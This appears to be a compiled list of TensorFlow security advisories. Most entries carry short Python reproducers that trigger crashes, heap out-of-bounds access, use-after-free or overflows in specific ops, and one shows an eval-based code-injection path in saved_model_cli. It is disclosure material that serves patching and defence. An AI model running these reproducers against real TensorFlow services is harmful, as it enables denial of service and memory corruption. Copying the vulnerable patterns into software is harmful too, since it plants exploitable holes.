Reachable Assertion in Tensorflow

When decoding a resource handle tensor from protobuf, a TensorFlow process can encounter cases where a CHECK assertion is invalidated based on user controlled arguments. This allows attackers to cause denial of services in TensorFlow processes.

Out-of-bounds Write

Tensorflow is an Open Source Machine Learning Framework. The TFG dialect of TensorFlow makes several assumptions about the incoming GraphDef before converting it to the MLIR-based dialect. If an attacker changes the SavedModel format on disk to invalidate these assumptions and the GraphDef is then converted to MLIR-based IR then they can cause a crash in the Python interpreter. Under certain scenarios, heap OOB read/writes are possible. These issues have …

Out of bounds write in TFLite

An attacker can craft a TFLite model that would cause a write outside of bounds of an array in TFLite. In fact, the attacker can override the linked list used by the memory allocator. This can be leveraged for an arbitrary write primitive under certain conditions.

Out of bounds write in Tensorflow

TensorFlow is vulnerable to a heap OOB write in Grappler: Status SetUnknownShape(const NodeDef* node, int output_port) { shape_inference::ShapeHandle shape = GetUnknownOutputShape(node, output_port); InferenceContext* ctx = GetContext(node); if (ctx == nullptr) { return errors::InvalidArgument("Missing context"); } ctx->set_output(output_port, shape); return Status::OK(); } The set_output function writes to an array at the specified index: void set_output(int idx, ShapeHandle shape) { outputs_.at(idx) = shape; } Hence, this gives a malicious user a write primitive.

Out of bounds read in Tensorflow

The implementation of FractionalAvgPoolGrad does not consider cases where the input tensors are invalid allowing an attacker to read from outside of bounds of heap: import tensorflow as tf @tf.function def test(): y = tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=[2,2,2,2], out_backprop=[[[[1,2], [3, 4], [5, 6]], [[7, 8], [9,10], [11,12]]]], row_pooling_sequence=[-10,1,2,3], col_pooling_sequence=[1,2,3,4], overlapping=True) return y test()

Out of bounds read in Tensorflow

The implementation of Dequantize does not fully validate the value of axis and can result in heap OOB accesses: import tensorflow as tf @tf.function def test(): y = tf.raw_ops.Dequantize( input=tf.constant([1,1],dtype=tf.qint32), min_range=[1.0], max_range=[10.0], mode='MIN_COMBINED', narrow_range=False, axis=2**31-1, dtype=tf.bfloat16) return y test() The axis argument can be -1 (the default value for the optional argument) or any other positive value at most the number of dimensions of the input. Unfortunately, the upper bound …

Out of bounds read in Tensorflow

TensorFlow's type inference can cause a heap OOB read as the bounds checking is done in a DCHECK (which is a no-op during production): if (node_t.type_id() != TFT_UNSET) { int ix = input_idx[i]; DCHECK(ix < node_t.args_size()) << "input " << i << " should have an output " << ix << " but instead only has " << node_t.args_size() << " outputs: " << node_t.DebugString(); input_types.emplace_back(node_t.args(ix)); // … } An …

Out of bounds read in Tensorflow

The implementation of shape inference for ReverseSequence does not fully validate the value of batch_dim and can result in a heap OOB read: import tensorflow as tf @tf.function def test(): y = tf.raw_ops.ReverseSequence( input = ['aaa','bbb'], seq_lengths = [1,1,1], seq_dim = -10, batch_dim = -10 ) return y test() There is a check to make sure the value of batch_dim does not go over the rank of the input, but …

Out of bounds read and write in Tensorflow

There is a typo in TensorFlow's SpecializeType which results in heap OOB read/write: for (int i = 0; i < op_def.output_arg_size(); i++) { // … for (int j = 0; j < t->args_size(); j++) { auto* arg = t->mutable_args(i); // … } } Due to a typo, arg is initialized to the ith mutable argument in a loop where the loop index is j. Hence it is possible to assign …

Null-dereference in Tensorflow

When decoding a tensor from protobuf, TensorFlow might do a null-dereference if attributes of some mutable arguments to some operations are missing from the proto. This is guarded by a DCHECK: const auto* attr = attrs.Find(arg->s()); DCHECK(attr != nullptr); if (attr->value_case() == AttrValue::kList) { // … } However, DCHECK is a no-op in production builds and an assertion failure in debug builds. In the first case execution proceeds to the …

Null pointer dereference in TensorFlow

When building an XLA compilation cache, if default settings are used, TensorFlow triggers a null pointer dereference: string allowed_gpus = flr->config_proto()->gpu_options().visible_device_list(); In the default scenario, all devices are allowed, so flr->config_proto is nullptr.

Null pointer dereference in TensorFlow

The implementation of QuantizedMaxPool has an undefined behavior where user controlled inputs can trigger a reference binding to null pointer. import tensorflow as tf tf.raw_ops.QuantizedMaxPool( input = tf.constant([[[[4]]]], dtype=tf.quint8), min_input = [], max_input = [1], ksize = [1, 1, 1, 1], strides = [1, 1, 1, 1], padding = "SAME", name=None )

NULL Pointer Dereference and Access of Uninitialized Pointer in TensorFlow

Impact The code for boosted trees in TensorFlow is still missing validation. This allows malicious users to read and write outside of bounds of heap allocated data as well as trigger denial of service (via dereferencing nullptrs or via CHECK-failures). This follows after CVE-2021-41208 where these APIs were still vulnerable to multiple security issues. Note: Given that the boosted trees implementation in TensorFlow is unmaintained, it is recommended to no …

Memory leak in decoding PNG images

When decoding PNG images TensorFlow can produce a memory leak if the image is invalid. After calling png::CommonInitDecode(…, &decode), the decode value contains allocated buffers which can only be freed by calling png::CommonFreeDecode(&decode). However, several error cases in the function implementation invoke the OP_REQUIRES macro which immediately terminates the execution of the function, without allowing for the memory free to occur.

Integer overflows in Tensorflow

The implementation of AddManySparseToTensorsMap is vulnerable to an integer overflow which results in a CHECK-fail when building new TensorShape objects (so, an assert failure based denial of service): import tensorflow as tf import numpy as np tf.raw_ops.AddManySparseToTensorsMap( sparse_indices=[(0,0),(0,1),(0,2),(4,3),(5,0),(5,1)], sparse_values=[1,1,1,1,1,1], sparse_shape=[232,232], container='', shared_name='', name=None) We are missing some validation on the shapes of the input tensors as well as directly constructing a large TensorShape with user-provided dimensions. The latter is an …

Integer overflows in Tensorflow

The implementations of SparseCwise ops are vulnerable to integer overflows. These can be used to trigger large allocations (so, OOM based denial of service) or CHECK-fails when building new TensorShape objects (so, assert failures based denial of service): import tensorflow as tf import numpy as np tf.raw_ops.SparseDenseCwiseDiv( sp_indices=np.array([[9]]), sp_values=np.array([5]), sp_shape=np.array([92233720368., 92233720368]), dense=np.array([4])) We are missing some validation on the shapes of the input tensors as well as directly constructing a …

Integer Overflow or Wraparound in TensorFlow

Impact The Grappler component of TensorFlow is vulnerable to a denial of service via a CHECK-failure in constant folding. The output_prop tensor has a shape that is controlled by user input and this can result in triggering one of the CHECKs in the PartialTensorShape constructor. This is an instance of TFSA-2021-198. Patches We have patched the issue in GitHub commit be7b286d40bc68cb0b56f702186cc4837d508058; the fix will be …

Integer overflow leading to crash in Tensorflow

The implementation of SparseCountSparseOutput can be made to crash a TensorFlow process by an integer overflow whose result is then used in a memory allocation: import tensorflow as tf import numpy as np tf.raw_ops.SparseCountSparseOutput( indices=[[1,1]], values=[2], dense_shape=[2 ** 31, 2 ** 32], weights=[1], binary_output=True, minlength=-1, maxlength=-1, name=None)

Integer overflow in TFLite array creation

An attacker can craft a TFLite model that would cause an integer overflow in TfLiteIntArrayCreate: TfLiteIntArray* TfLiteIntArrayCreate(int size) { int alloc_size = TfLiteIntArrayGetSizeInBytes(size); // … TfLiteIntArray* ret = (TfLiteIntArray*)malloc(alloc_size); // … } The TfLiteIntArrayGetSizeInBytes returns an int instead of a size_t: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; int computed_size = sizeof(dummy) + sizeof(dummy.data[0]) * size;

Integer overflow in TFLite

An attacker can craft a TFLite model that would cause an integer overflow in embedding lookup operations: int embedding_size = 1; int lookup_size = 1; for (int i = 0; i < lookup_rank - 1; i++, k++) { const int dim = dense_shape->data.i32[i]; lookup_size *= dim; output_shape->data[k] = dim; } for (int i = 1; i < embedding_rank; i++, k++) { const int dim = SizeOfDimension(value, i); embedding_size *= dim; …

Integer overflow in TensorFlow

Under certain scenarios, Grappler component of TensorFlow is vulnerable to an integer overflow during cost estimation for crop and resize. Since the cropping parameters are user controlled, a malicious person can trigger undefined behavior.

Integer overflow in Tensorflow

The implementation of shape inference for Dequantize is vulnerable to an integer overflow weakness: import tensorflow as tf input = tf.constant([1,1],dtype=tf.qint32) @tf.function def test(): y = tf.raw_ops.Dequantize( input=input, min_range=[1.0], max_range=[10.0], mode='MIN_COMBINED', narrow_range=False, axis=2**31-1, dtype=tf.bfloat16) return y test() The axis argument can be -1 (the default value for the optional argument) or any other positive value at most the number of dimensions of the input. Unfortunately, the upper bound is not …

Insecure temporary file in Tensorflow

In multiple places, TensorFlow uses tempfile.mktemp to create temporary files. While this is acceptable in testing, in utilities and libraries it is dangerous as a different process can create the file between the check for the filename in mktemp and the actual creation of the file by a subsequent operation (a TOCTOU type of weakness). In several instances, TensorFlow was supposed to actually create a temporary directory instead of a …
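
For reference, a minimal sketch contrasting the unsafe pattern with the standard-library alternatives (illustrative only, not TensorFlow's actual code):

    import os
    import tempfile

    # Unsafe: mktemp() only returns a name; another process can create that
    # path between this call and the open() below (the TOCTOU window).
    path = tempfile.mktemp()
    with open(path, 'w') as f:
        f.write('data')
    os.remove(path)

    # Safer: mkstemp() creates and opens the file atomically, and
    # TemporaryDirectory() covers the cases where a directory was intended.
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, 'w') as f:
        f.write('data')
    os.remove(path)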

Heap overflow in Tensorflow

The implementation of SparseCountSparseOutput is vulnerable to a heap overflow: import tensorflow as tf import numpy as np tf.raw_ops.SparseCountSparseOutput( indices=[[-1,-1]], values=[2], dense_shape=[1, 1], weights=[1], binary_output=True, minlength=-1, maxlength=-1, name=None)

Division by zero in TFLite

An attacker can craft a TFLite model that would trigger a division by zero in the implementation of depthwise convolutions. The parameters of the convolution can be user controlled and are also used within a division operation to determine the size of the padding that needs to be added before applying the convolution. There is no check before this division that the divisor is strictly positive.

Division by zero in TFLite

An attacker can craft a TFLite model that would trigger a division by zero in BiasAndClamp implementation: inline void BiasAndClamp(float clamp_min, float clamp_max, int bias_size, const float* bias_data, int array_size, float* array_data) { // … TFLITE_DCHECK_EQ((array_size % bias_size), 0); // … } There is no check that the bias_size is non zero.

Crash when type cannot be specialized in Tensorflow

Under certain scenarios, TensorFlow can fail to specialize a type during shape inference: void InferenceContext::PreInputInit( const OpDef& op_def, const std::vector<const Tensor*>& input_tensors, const std::vector<ShapeHandle>& input_tensors_as_shapes) { const auto ret = full_type::SpecializeType(attrs_, op_def); DCHECK(ret.status().ok()) << "while instantiating types: " << ret.status(); ret_types_ = ret.ValueOrDie(); // … } However, DCHECK is a no-op in production builds and an assertion failure in debug builds. In the first case execution proceeds to the ValueOrDie …

Crash due to erroneous `StatusOr` in TensorFlow

A GraphDef from a TensorFlow SavedModel can be maliciously altered to cause a TensorFlow process to crash due to encountering a StatusOr value that is an error and forcibly extracting the value from it: if (op_reg_data->type_ctor != nullptr) { VLOG(3) << "AddNode: found type constructor for " << node_def.name(); const auto ctor_type = full_type::SpecializeType(AttrSlice(node_def), op_reg_data->op_def); const FullTypeDef ctor_typedef = ctor_type.ValueOrDie(); if (ctor_typedef.type_id() != TFT_UNSET) { *(node_def.mutable_experimental_type()) = ctor_typedef; } } …

Assertion failure based denial of service in Tensorflow

The implementation of *Bincount operations allows malicious users to cause denial of service by passing in arguments which would trigger a CHECK-fail: import tensorflow as tf tf.raw_ops.DenseBincount( input=[[0], [1], [2]], size=[1], weights=[3,2,1], binary_output=False) There are several conditions that the input arguments must satisfy. Some are not caught during shape inference and others are not caught during kernel implementation. This results in CHECK failures later when the output tensors get allocated.

2021

Use after free / memory leak in `CollectiveReduceV2`

The async implementation of CollectiveReduceV2 suffers from a memory leak and a use after free: import tensorflow as tf tf.raw_ops.CollectiveReduceV2( input=[], group_size=[-10, -10, -10], group_key=[-10, -10], instance_key=[-10], ordering_token=[], merge_op='Mul', final_op='Div') This occurs due to the asynchronous computation and the fact that objects that have been std::move()d from are still accessed: auto done_with_cleanup = [col_params, done = std::move(done)]() { done(); col_params->Unref(); }; OP_REQUIRES_OK_ASYNC(c, FillCollectiveParams(col_params, REDUCTION_COLLECTIVE, /*group_size*/ c->input(1), /*group_key*/ c->input(2), /*instance_key*/ c->input(3)), …

Uninitialized access in `EinsumHelper::ParseEquation`

During execution, EinsumHelper::ParseEquation() is supposed to set the flags in input_has_ellipsis vector and *output_has_ellipsis boolean to indicate whether there is ellipsis in the corresponding inputs and output. However, the code only changes these flags to true and never assigns false. for (int i = 0; i < num_inputs; ++i) { input_label_counts->at(i).resize(num_labels); for (const int label : input_labels->at(i)) { if (label != kEllipsisLabel) input_label_counts->at(i)[label] += 1; else input_has_ellipsis->at(i) = true; } …

Undefined behavior via `nullptr` reference binding in sparse matrix multiplication

The code for sparse matrix multiplication is vulnerable to undefined behavior via binding a reference to nullptr: import tensorflow as tf tf.raw_ops.SparseMatMul( a=[[1.0,1.0,1.0]], b=[[],[],[]], transpose_a=False, transpose_b=False, a_is_sparse=False, b_is_sparse=True) This occurs whenever the dimensions of a or b are 0 or less. In the case where one of these is 0, an empty output tensor should be allocated (to preserve the invariant that output tensors are always allocated when the operation …

Segfault due to negative splits in `SplitV`

The implementation of SplitV can trigger a segfault if an attacker supplies negative arguments: import tensorflow as tf tf.raw_ops.SplitV( value=tf.constant([]), size_splits=[-1, -2], axis=0, num_split=2) This occurs whenever size_splits contains more than one value and at least one value is negative.

Overflow/crash in `tf.tile` when tiling tensor is large

If tf.tile is called with a large input argument then the TensorFlow process will crash due to a CHECK-failure caused by an overflow. import tensorflow as tf import numpy as np tf.keras.backend.tile(x=np.ones((1,1,1)), n=[100000000,100000000, 100000000]) The number of elements in the output tensor is too large for the int64_t type and the overflow is detected via a CHECK statement. This aborts the process.

Overflow/crash in `tf.range`

While calculating the size of the output within the tf.range kernel, there is a conditional statement of type int64 = condition ? int64 : double. Due to C++ implicit conversion rules, both branches of the condition will be cast to double and the result would be truncated before the assignment. This results in overflows: import tensorflow as tf tf.sparse.eye(num_rows=9223372036854775807, num_columns=None) Similarly, tf.range would result in crashes due to overflows if …
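
A hedged sketch of the truncated tf.range case (the limit below is a placeholder, chosen so the computed element count cannot survive the int64-to-double-to-int64 round trip described above):

    import tensorflow as tf

    # Hypothetical sketch: 2**63 - 1 is not representable exactly as a
    # double, so the computed output size rounds up past the int64 maximum
    # and overflows; on vulnerable versions this crashes the process.
    tf.range(start=0, limit=2**63 - 1, delta=1)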

Overflow/crash in `tf.image.resize` when size is large

If tf.image.resize is called with a large input argument then the TensorFlow process will crash due to a CHECK-failure caused by an overflow. import tensorflow as tf import numpy as np tf.keras.layers.UpSampling2D( size=1610637938, data_format='channels_first', interpolation='bilinear')(np.ones((5,1,1,1))) The number of elements in the output tensor is too large for the int64_t type and the overflow is detected via a CHECK statement. This aborts the process.

Null pointer exception when `Exit` node is not preceded by `Enter` op

The process of building the control flow graph for a TensorFlow model is vulnerable to a null pointer exception when nodes that should be paired are not: import tensorflow as tf @tf.function def func(): return tf.raw_ops.Exit(data=[False,False]) func() This occurs because the code assumes that the first node in the pairing (e.g., an Enter node) always exists when encountering the second node (e.g., an Exit node): … } else if (IsExit(curr_node)) …

Null pointer exception in `DeserializeSparse`

The shape inference code for DeserializeSparse can trigger a null pointer dereference: import tensorflow as tf dataset = tf.data.Dataset.range(3) @tf.function def test(): y = tf.raw_ops.DeserializeSparse( serialized_sparse=tf.data.experimental.to_variant(dataset), dtype=tf.int32) test() This is because the shape inference function assumes that the serialized_sparse tensor is a tensor with positive rank (and having 3 as the last dimension). However, in the example above, the argument is a scalar (i.e., rank 0).

Integer division by 0 in `tf.raw_ops.AllToAll`

The shape inference code for AllToAll can be made to execute a division by 0: import tensorflow as tf @tf.function def func(): return tf.raw_ops.AllToAll( input=[0.0, 0.1652, 0.6543], group_assignment=[1, -1], concat_dimension=0, split_dimension=0, split_count=0) func() This occurs whenever the split_count argument is 0: TF_RETURN_IF_ERROR(c->GetAttr("split_count", &split_count)); … for (int32_t i = 0; i < rank; ++i) { … dims[i] = c->MakeDim(c->Value(dims[i]) / split_count); … }

Incomplete validation of shapes in multiple TF ops

Several TensorFlow operations are missing validation for the shapes of the tensor arguments involved in the call. Depending on the API, this can result in undefined behavior and segfault or CHECK-fail related crashes but in some scenarios writes and reads from heap populated arrays are also possible. We have discovered these issues internally via tooling while working on improving/testing GPU op determinism. As such, we don't have reproducers and there …

Incomplete validation in boosted trees code

The code for boosted trees in TensorFlow is still missing validation. As a result, attackers can trigger denial of service (via dereferencing nullptrs or via CHECK-failures) as well as abuse undefined behavior (binding references to nullptrs). An attacker can also read and write from heap buffers, depending on the API that gets used and the arguments that are passed to the call. Note: Given that the boosted trees implementation in …

Heap OOB read in `tf.raw_ops.SparseCountSparseOutput`

The shape inference functions for SparseCountSparseOutput can trigger a read outside of bounds of heap allocated array: import tensorflow as tf @tf.function def func(): return tf.raw_ops.SparseCountSparseOutput( indices=[1], values=[[1]], dense_shape=[10], weights=[], binary_output= True) func() The function fails to check that the first input (i.e., indices) has rank 2: auto rank = c->Dim(c->input(0), 1);

Heap OOB in shape inference for `QuantizeV2`

The shape inference code for QuantizeV2 can trigger a read outside of bounds of heap allocated array. The code allows axis to be an optional argument (s would contain an error::NOT_FOUND error code). Otherwise, it assumes that axis is a valid index into the dimensions of the input tensor. If axis is less than -1 then this results in a heap OOB read.
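
A hedged sketch based on this description (argument names follow the QuantizeV2 reproducer that appears later in this list; the values are placeholders, with the axis below -1 being the relevant part):

    import tensorflow as tf

    @tf.function
    def test():
        # Hypothetical sketch: axis values smaller than -1 are not rejected,
        # so shape inference reads before the start of the dimensions array.
        return tf.raw_ops.QuantizeV2(
            input=[1.0, 2.0, 3.0],
            min_range=[0.0], max_range=[10.0],
            T=tf.qint32, mode='SCALED',
            round_mode='HALF_AWAY_FROM_ZERO',
            narrow_range=False, axis=-2, ensure_minimum_range=0.01)

    test()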

Heap OOB in `SparseBinCount`

The implementation of SparseBinCount is vulnerable to a heap OOB: import tensorflow as tf tf.raw_ops.SparseBincount( indices=[[0],[1],[2]], values=[0,-10000000], dense_shape=[1,1], size=[1], weights=[3,2,1], binary_output=False) This is because of missing validation between the elements of the values argument and the shape of the sparse output: for (int64_t i = 0; i < indices_mat.dimension(0); ++i) { const int64_t batch = indices_mat(i, 0); const Tidx bin = values(i); … out(batch, bin) = …; }

Heap OOB in `FusedBatchNorm` kernels

The implementation of FusedBatchNorm kernels is vulnerable to a heap OOB: import tensorflow as tf tf.raw_ops.FusedBatchNormGrad( y_backprop=tf.constant([i for i in range(9)],shape=(1,1,3,3),dtype=tf.float32), x=tf.constant([i for i in range(2)],shape=(1,1,1,2),dtype=tf.float32), scale=[1,1], reserve_space_1=[1,1], reserve_space_2=[1,1,1], epsilon=1.0, data_format='NCHW', is_training=True)

Heap buffer overflow in `Transpose`

The shape inference function for Transpose is vulnerable to a heap buffer overflow: import tensorflow as tf @tf.function def test(): y = tf.raw_ops.Transpose(x=[1,2,3,4],perm=[-10]) return y test() This occurs whenever perm contains negative elements. The shape inference function does not validate that the indices in perm are all valid: for (int32_t i = 0; i < rank; ++i) { int64_t in_idx = data[i]; if (in_idx >= rank) { return errors::InvalidArgument("perm dim …

FPE in `ParallelConcat`

The implementation of ParallelConcat misses some input validation and can produce a division by 0: import tensorflow as tf @tf.function def test(): y = tf.raw_ops.ParallelConcat(values=[['tf']],shape=0) return y test()

Deadlock in mutually recursive `tf.function` objects

The code behind tf.function API can be made to deadlock when two tf.function decorated Python functions are mutually recursive: import tensorflow as tf @tf.function() def fun1(num): if num == 1: return print(num) fun2(num-1) @tf.function() def fun2(num): if num == 0: return print(num) fun1(num-1) fun1(9) This occurs due to using a non-reentrant Lock Python object. Loading any model which contains mutually recursive functions is vulnerable. An attacker can cause denial of …

Crashes due to overflow and `CHECK`-fail in ops with large tensor shapes

TensorFlow allows tensors to have a large number of dimensions and each dimension can be as large as desired. However, the total number of elements in a tensor must fit within an int64_t. If an overflow occurs, MultiplyWithoutOverflow would return a negative result. In the majority of the TensorFlow codebase this then results in a CHECK-failure. Newer constructs exist which return a Status instead of crashing the binary.
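
A back-of-the-envelope illustration of the condition described (plain Python arithmetic, not TensorFlow code; the shape is a hypothetical example):

    INT64_MAX = 2**63 - 1

    dims = [2**21, 2**21, 2**21]        # a hypothetical requested shape
    num_elements = 1
    for d in dims:
        num_elements *= d
    # 2**63 exceeds INT64_MAX, so a shape like this overflows the element
    # count and, in most of the codebase, ends in a CHECK-failure as above.
    print(num_elements > INT64_MAX)     # True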

Crash in `tf.math.segment_*` operations

The implementation of tf.math.segment_* operations results in a CHECK-fail related abort (and denial of service) if a segment id in segment_ids is large. import tensorflow as tf import numpy as np tf.math.segment_max(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) tf.math.segment_min(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) tf.math.segment_mean(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) tf.math.segment_sum(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) tf.math.segment_prod(data=np.ones((1,10,1)), segment_ids=[1676240524292489355])

Crash in `max_pool3d` when size argument is 0 or negative

The Keras pooling layers can trigger a segfault if the size of the pool is 0 or if a dimension is negative: import tensorflow as tf pool_size = [2, 2, 0] layer = tf.keras.layers.MaxPooling3D(strides=1, pool_size=pool_size) input_tensor = tf.random.uniform([3, 4, 10, 11, 12], dtype=tf.float32) res = layer(input_tensor) This is due to TensorFlow's implementation of pooling operations, where the values in the sliding window are not checked to be strictly positive.

Code injection in `saved_model_cli`

TensorFlow's saved_model_cli tool is vulnerable to a code injection as it calls eval on user supplied strings def preprocess_input_exprs_arg_string(input_exprs_str): … for input_raw in filter(bool, input_exprs_str.split(';')): … input_key, expr = input_raw.split('=', 1) input_dict[input_key] = eval(expr) … This can be used by attackers to run arbitrary code on the platform where the CLI tool runs. However, given that the tool is always run manually, the impact of this is not severe. We …
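
To make the mechanism concrete, a hedged illustration of calling the quoted helper directly with a malicious expression; the import path is an assumption about where the helper lives in the tool, and patched releases change this behavior:

    # Illustrative only; module path assumed, not taken from the advisory.
    from tensorflow.python.tools.saved_model_cli import (
        preprocess_input_exprs_arg_string)

    # Everything after '=' is handed to eval(), so an arbitrary Python
    # expression (here one that runs a shell command) gets executed.
    preprocess_input_exprs_arg_string("x=__import__('os').system('id')")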

Arbitrary memory read in `ImmutableConst`

The ImmutableConst operation in TensorFlow can be tricked into reading arbitrary memory contents: import tensorflow as tf with open('/tmp/test','wb') as f: f.write(b'\xe2'*128) data = tf.raw_ops.ImmutableConst(dtype=tf.string,shape=3,memory_region_name='/tmp/test') print(data) This is because the tstring TensorFlow string class has a special case for memory mapped strings but the operation itself does not offer any support for this datatype.

Access to invalid memory during shape inference in `Cudnn*` ops

The shape inference code for the Cudnn* operations in TensorFlow can be tricked into accessing invalid memory, via a heap buffer overflow: import tensorflow as tf @tf.function def func(): return tf.raw_ops.CudnnRNNV3( input=[0.1, 0.1], input_h=[0.5], input_c=[0.1, 0.1, 0.1], params=[0.5, 0.5], sequence_lengths=[-1, 0, 1]) func() This occurs because the ranks of the input, input_h and input_c parameters are not validated, but code assumes they have certain values: auto input_shape = c->input(0); auto …

A use of uninitialized value vulnerability in Tensorflow

TensorFlow's Grappler optimizer has a use of an uninitialized variable: const NodeDef* dequeue_node; for (const auto& train_node : train_nodes) { if (IsDequeueOp(*train_node)) { dequeue_node = train_node; break; } } if (dequeue_node) { … } If the train_nodes vector (obtained from the saved model that gets optimized) does not contain a Dequeue node, then dequeue_node is left uninitialized.

`SparseFillEmptyRows` heap OOB

The implementation of SparseFillEmptyRows can be made to trigger a heap OOB access: import tensorflow as tf data=tf.raw_ops.SparseFillEmptyRows( indices=[[0,0],[0,0],[0,0]], values=['sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss'], dense_shape=[5,3], default_value='o') This occurs whenever the size of indices does not match the size of values.

Use of uninitialized value in TFLite

All TFLite operations that use quantization can be made to use uninitialized values. For example: const auto* affine_quantization = reinterpret_cast<TfLiteAffineQuantization*>( filter->quantization.params); The issue stems from the fact that quantization.params is only valid if quantization.type is different from kTfLiteNoQuantization. However, these checks are missing in large parts of the code.

Use after free in boosted trees creation

The implementation for tf.raw_ops.BoostedTreesCreateEnsemble can result in a use after free error if an attacker supplies specially crafted arguments: import tensorflow as tf v= tf.Variable([0.0]) tf.raw_ops.BoostedTreesCreateEnsemble( tree_ensemble_handle=v.handle, stamp_token=[0], tree_ensemble_serialized=['0'])

Use after free and segfault in shape inference functions

When running shape functions, some functions (such as MutableHashTableShape) produce extra output information in the form of a ShapeAndType struct. The shapes embedded in this struct are owned by an inference context that is cleaned up almost immediately; if the upstream code attempts to access this shape information, it can trigger a segfault. ShapeRefiner is mitigating this for normal output shapes by cloning them (and thus putting the newly created …

Segfault on string tensors with mismatched dimensions, due to Go code

Under certain conditions, Go code can trigger a segfault in string deallocation. For string tensors, C.TF_TString_Dealloc is called during garbage collection within a finalizer function. However, tensor structure isn't checked until encoding to avoid a performance penalty. The current method for dealloc assumes that encoding succeeded, but segfaults when a string tensor is garbage collected whose encoding failed (e.g., due to mismatched dimensions). To fix this, the call to set …

Reference binding to nullptr in unicode encoding

An attacker can cause undefined behavior via binding a reference to null pointer in tf.raw_ops.UnicodeEncode: import tensorflow as tf from tensorflow.python.ops import gen_string_ops gen_string_ops.unicode_encode( input_values=[], input_splits=[], output_encoding='UTF-8', errors='ignore', replacement_char='a')

Reference binding to nullptr in shape inference

An attacker can cause undefined behavior via binding a reference to null pointer in tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf tf.compat.v1.disable_v2_behavior() tf.raw_ops.SparseFillEmptyRows( indices = tf.constant([], shape=[0, 0], dtype=tf.int64), values = tf.constant([], shape=[0], dtype=tf.int64), dense_shape = tf.constant([], shape=[0], dtype=tf.int64), default_value = 0)

Reference binding to nullptr in map operations

An attacker can cause undefined behavior via binding a reference to null pointer in tf.raw_ops.Map* and tf.raw_ops.OrderedMap* operations: import tensorflow as tf tf.raw_ops.MapPeek( key=tf.constant([8],dtype=tf.int64), indices=[], dtypes=[tf.int32], capacity=8, memory_limit=128)

Reference binding to nullptr in boosted trees

An attacker can generate undefined behavior via a reference binding to nullptr in BoostedTreesCalculateBestGainsPerFeature: import tensorflow as tf tf.raw_ops.BoostedTreesCalculateBestGainsPerFeature( node_id_range=[], stats_summary_list=[[1,2,3]], l1=[1.0], l2=[1.0], tree_complexity =[1.0], min_node_weight =[1.17], max_splits=5) A similar attack can occur in BoostedTreesCalculateBestFeatureSplitV2: import tensorflow as tf tf.raw_ops.BoostedTreesCalculateBestFeatureSplitV2( node_id_range=[], stats_summaries_list=[[1,2,3]], split_types=[''], candidate_feature_ids=[1,2,3,4], l1=[1], l2=[1], tree_complexity=[1.0], min_node_weight=[1.17], logits_dimension=5)

Null pointer dereference in TFLite

An attacker can craft a TFLite model that would trigger a null pointer dereference, which would result in a crash and denial of service: import tensorflow as tf model = tf.keras.models.Sequential() model.add(tf.keras.Input(shape=(1, 2, 3))) model.add(tf.keras.layers.Dense(0, activation='relu')) converter = tf.lite.TFLiteConverter.from_keras_model(model) tflite_model = converter.convert() interpreter = tf.lite.Interpreter(model_content=tflite_model) interpreter.allocate_tensors() interpreter.invoke()

Null pointer dereference in `UncompressElement`

The code for tf.raw_ops.UncompressElement can be made to trigger a null pointer dereference: import tensorflow as tf data = tf.data.Dataset.from_tensors([0.0]) tf.raw_ops.UncompressElement( compressed=tf.data.experimental.to_variant(data), output_types=[tf.int64], output_shapes=[2])

Null pointer dereference in `RaggedTensorToTensor`

Sending invalid argument for row_partition_types of tf.raw_ops.RaggedTensorToTensor API results in a null pointer dereference and undefined behavior: import tensorflow as tf tf.raw_ops.RaggedTensorToTensor( shape=1, values=10, default_value=21, row_partition_tensors=tf.constant([0,0,0,0]), row_partition_types=[])

Null pointer dereference in `MatrixDiagPartOp`

If a user does not provide a valid padding value to tf.raw_ops.MatrixDiagPartOp, then the code triggers a null pointer dereference (if input is empty) or produces invalid behavior, ignoring all values after the first: import tensorflow as tf tf.raw_ops.MatrixDiagPartV2( input=tf.ones(2,dtype=tf.int32), k=tf.ones(2,dtype=tf.int32), padding_value=[]) Although this example is given for MatrixDiagPartV2, all versions of the operation are affected.

Null pointer dereference and heap OOB read in operations restoring tensors

When restoring tensors via raw APIs, if the tensor name is not provided, TensorFlow can be tricked into dereferencing a null pointer: import tensorflow as tf tf.raw_ops.Restore( file_pattern=['/tmp'], tensor_name=[], default_value=21, dt=tf.int32, preferred_shard=1) The same undefined behavior can be triggered by tf.raw_ops.RestoreSlice: import tensorflow as tf import numpy as np tf.raw_ops.RestoreSlice( file_pattern=['/tmp'], tensor_name=[], shape_and_slice='2', dt=np.array([tf.int32]), preferred_shard=1) Alternatively, attackers can read memory outside the bounds of heap allocated data by providing some tensor names but not …

NPE in TFLite

The implementation of SVDF in TFLite is vulnerable to a null pointer error: TfLiteTensor* state = GetVariableInput(context, node, kStateTensor); // … GetTensorData<float>(state) The GetVariableInput function can return a null pointer but GetTensorData assumes that the argument is always a valid tensor. TfLiteTensor* GetVariableInput(TfLiteContext* context, const TfLiteNode* node, int index) { TfLiteTensor* tensor = GetMutableInput(context, node, index); return tensor->is_variable ? tensor : nullptr; } Furthermore, because GetVariableInput calls GetMutableInput which might …

Missing validation in shape inference for `Dequantize`

The shape inference code for tf.raw_ops.Dequantize has a vulnerability that could trigger a denial of service via a segfault if an attacker provides invalid arguments: import tensorflow as tf tf.compat.v1.disable_v2_behavior() input_tensor = tf.constant(-10.0, dtype=tf.float32) input_tensor = tf.cast(input_tensor, dtype=tf.quint8) tf.raw_ops.Dequantize( input=input_tensor, min_range = tf.constant([], shape=[0], dtype=tf.float32), max_range = tf.constant([], shape=[0], dtype=tf.float32), mode = 'MIN_COMBINED', narrow_range=False, axis=-10, dtype=tf.dtypes.float32)

Integer overflow due to conversion to unsigned

The implementation of tf.raw_ops.QuantizeAndDequantizeV4Grad is vulnerable to an integer overflow issue caused by converting a signed integer value to an unsigned one and then allocating memory based on this value. import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV4Grad( gradients=[1.0,2.0], input=[1.0,1.0], input_min=[0.0], input_max=[10.0], axis=-100)

Infinite loop in TFLite

